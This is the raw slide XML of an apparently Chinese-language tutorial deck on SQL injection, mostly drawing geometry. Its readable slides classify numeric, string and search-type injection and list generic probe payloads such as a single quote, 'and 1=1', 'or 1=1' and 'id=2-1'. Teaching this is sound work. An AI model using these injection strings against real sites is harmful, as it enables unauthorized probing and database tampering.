                  <a:pt x="62" y="243"/>
                  <a:pt x="65" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="262"/>
                  <a:pt x="72" y="273"/>
                  <a:pt x="64" y="281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="288"/>
                  <a:pt x="46" y="285"/>
                  <a:pt x="36" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="279"/>
                  <a:pt x="17" y="276"/>
                  <a:pt x="11" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="288"/>
                  <a:pt x="8" y="297"/>
                  <a:pt x="11" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="317"/>
                  <a:pt x="17" y="328"/>
                  <a:pt x="10" y="335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="326"/>
                  <a:pt x="10" y="317"/>
                  <a:pt x="7" y="308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="297"/>
                  <a:pt x="0" y="287"/>
                  <a:pt x="8" y="2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2B18A7D9-FF2E-40E9-BF5F-770D72B42844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1982220" y="1624149"/>
            <a:ext cx="1489075" cy="1487488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 726 w 762"/>
              <a:gd name="T1" fmla="*/ 36 h 762"/>
              <a:gd name="T2" fmla="*/ 726 w 762"/>
              <a:gd name="T3" fmla="*/ 163 h 762"/>
              <a:gd name="T4" fmla="*/ 163 w 762"/>
              <a:gd name="T5" fmla="*/ 727 h 762"/>
              <a:gd name="T6" fmla="*/ 35 w 762"/>
              <a:gd name="T7" fmla="*/ 727 h 762"/>
              <a:gd name="T8" fmla="*/ 35 w 762"/>
              <a:gd name="T9" fmla="*/ 727 h 762"/>
              <a:gd name="T10" fmla="*/ 35 w 762"/>
              <a:gd name="T11" fmla="*/ 599 h 762"/>
              <a:gd name="T12" fmla="*/ 599 w 762"/>
              <a:gd name="T13" fmla="*/ 36 h 762"/>
              <a:gd name="T14" fmla="*/ 726 w 762"/>
              <a:gd name="T15" fmla="*/ 36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6" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="762" y="71"/>
                  <a:pt x="762" y="128"/>
                  <a:pt x="726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7" y="762"/>
                  <a:pt x="70" y="762"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="692"/>
                  <a:pt x="0" y="635"/>
                  <a:pt x="35" y="599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634" y="0"/>
                  <a:pt x="691" y="0"/>
                  <a:pt x="726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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15C4BF0-1DE8-41FC-8F76-F95C5917F000}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3686403" y="1411607"/>
            <a:ext cx="893763" cy="890588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 422 w 457"/>
              <a:gd name="T1" fmla="*/ 35 h 456"/>
              <a:gd name="T2" fmla="*/ 422 w 457"/>
              <a:gd name="T3" fmla="*/ 162 h 456"/>
              <a:gd name="T4" fmla="*/ 163 w 457"/>
              <a:gd name="T5" fmla="*/ 421 h 456"/>
              <a:gd name="T6" fmla="*/ 35 w 457"/>
              <a:gd name="T7" fmla="*/ 421 h 456"/>
              <a:gd name="T8" fmla="*/ 35 w 457"/>
              <a:gd name="T9" fmla="*/ 421 h 456"/>
              <a:gd name="T10" fmla="*/ 35 w 457"/>
              <a:gd name="T11" fmla="*/ 294 h 456"/>
              <a:gd name="T12" fmla="*/ 294 w 457"/>
              <a:gd name="T13" fmla="*/ 35 h 456"/>
              <a:gd name="T14" fmla="*/ 422 w 457"/>
              <a:gd name="T15" fmla="*/ 35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7" h="456">
                <a:moveTo>
                  <a:pt x="422" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="457" y="70"/>
                  <a:pt x="457" y="127"/>
                  <a:pt x="422" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="456"/>
                  <a:pt x="70" y="456"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="386"/>
                  <a:pt x="0" y="329"/>
                  <a:pt x="35" y="294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="0"/>
                  <a:pt x="386" y="0"/>
                  <a:pt x="422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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65ED36B1-BA23-4A34-946C-BFED841AF9F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10263187" y="4295775"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 608 w 643"/>
              <a:gd name="T1" fmla="*/ 35 h 644"/>
              <a:gd name="T2" fmla="*/ 608 w 643"/>
              <a:gd name="T3" fmla="*/ 163 h 644"/>
              <a:gd name="T4" fmla="*/ 162 w 643"/>
              <a:gd name="T5" fmla="*/ 609 h 644"/>
              <a:gd name="T6" fmla="*/ 35 w 643"/>
              <a:gd name="T7" fmla="*/ 609 h 644"/>
              <a:gd name="T8" fmla="*/ 35 w 643"/>
              <a:gd name="T9" fmla="*/ 609 h 644"/>
              <a:gd name="T10" fmla="*/ 35 w 643"/>
              <a:gd name="T11" fmla="*/ 481 h 644"/>
              <a:gd name="T12" fmla="*/ 480 w 643"/>
              <a:gd name="T13" fmla="*/ 35 h 644"/>
              <a:gd name="T14" fmla="*/ 608 w 643"/>
              <a:gd name="T15" fmla="*/ 35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3" h="644">
                <a:moveTo>
                  <a:pt x="608" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="643" y="71"/>
                  <a:pt x="643" y="128"/>
                  <a:pt x="608" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="644"/>
                  <a:pt x="70" y="644"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="573"/>
                  <a:pt x="0" y="516"/>
                  <a:pt x="35" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="0"/>
                  <a:pt x="573" y="0"/>
                  <a:pt x="608" y="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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F8D3AE9-BF87-4579-BBC3-889D88549D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1878240" y="1219520"/>
            <a:ext cx="401638" cy="403225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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA206DA9-9744-4A14-A1E0-0028AB469800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3388745" y="1293949"/>
            <a:ext cx="401638" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 205"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 205"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 205"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 205"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 205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" h="206">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="205" y="73"/>
                  <a:pt x="205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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C5076B3-79BF-4B73-96FC-6FA82025D587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9907587" y="5491162"/>
            <a:ext cx="403225" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 206"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 206"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 206"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 206"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 206"/>
              <a:gd name="T9" fmla="*/ 3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" h="206">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="73"/>
                  <a:pt x="206" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169" y="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4283801" y="2906712"/>
            <a:ext cx="3624399" cy="655784"/>
          </a:xfrm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结束语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4283801" y="3844953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署名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4283801" y="4160587"/>
            <a:ext cx="3624399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fld id="{CB3FFC9E-A4C1-40CB-8E0E-23B63E3543C5}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/19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2017/12/3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515100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0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695323" y="1016000"/>
            <a:ext cx="10810876" cy="109538"/>
            <a:chOff x="628642" y="0"/>
            <a:chExt cx="27229910" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="平行四边形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="628642" y="0"/>
              <a:ext cx="27229910" cy="6858000"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 4237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5" name="平行四边形 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="876300" y="0"/>
              <a:ext cx="7183962" cy="6858000"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 3876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16" name="平行四边形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1507597" y="0"/>
              <a:ext cx="6240991" cy="6858000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6783916"/>
                <a:gd name="connsiteY0" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 2886624 w 6783916"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 6783916 w 6783916"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 3897292 w 6783916"/>
                <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 6783916"/>
                <a:gd name="connsiteY4" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6240991"/>
                <a:gd name="connsiteY0" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 2886624 w 6240991"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 6240991 w 6240991"/>
                <a:gd name="connsiteY2" fmla="*/ 9525 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 3897292 w 6240991"/>
                <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 6240991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0991" h="6858000">
                  <a:moveTo>
                    <a:pt x="0" y="6858000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2886624" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6240991" y="9525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38972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hyperlink" Target="http://note.youdao.com/noteshare?id=6f85dfa0e7d0d49427faece86b54af79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副标题 38"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515743" y="2779088"/>
            <a:ext cx="5160514" cy="558799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入详解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3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15744" y="3540202"/>
            <a:ext cx="5160513" cy="767764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br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690279" y="1650767"/>
            <a:ext cx="1729321" cy="158242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r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16600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BUSINESS REPORT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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DEBBC-415D-43E6-B865-8900E34E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注入分类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DE4F04-F3DF-4CD3-ABFD-C31C6C04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7D2C28-239A-4CB1-B7FE-AE97EEFAA439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1528997"/>
            <a:ext cx="108505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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数字型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ID=49 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这类注入的参数是数字型，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句原貌大致如下</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表明 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>=48</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入的参数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>id=47 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看条件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符型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class=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连续剧 这类注入为字符型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连续剧’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入的参数为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Class=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连续剧’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>] and ‘’=’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，即是生成语句：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连续剧’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>] and ‘’=’’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>搜索型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keyword=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关键字，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句原貌大致如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>like ’%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关键字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入的参数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>keyword=’ and [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>] and ‘%25’=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>， </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即是生成语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>like ’%’ and [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>] and ‘%’=’%’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50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E4603-3128-427A-9AD2-E0602C07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如何判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入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F5986A-00D4-4E24-90FF-7ACE758D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419C4D-E47F-405C-AB19-E3BB6534A595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1484026"/>
            <a:ext cx="1073759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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ 单引号测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>大法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400"/>
              <a:t>and 1=1 and 1=2 </a:t>
            </a:r>
          </a:p>
          <a:p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3.or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为或者的意思 两个都为假才是假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400"/>
              <a:t>or 1=1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加法和减法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400"/>
              <a:t>id=2+1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>id=2-1 (</a:t>
            </a:r>
            <a:r>
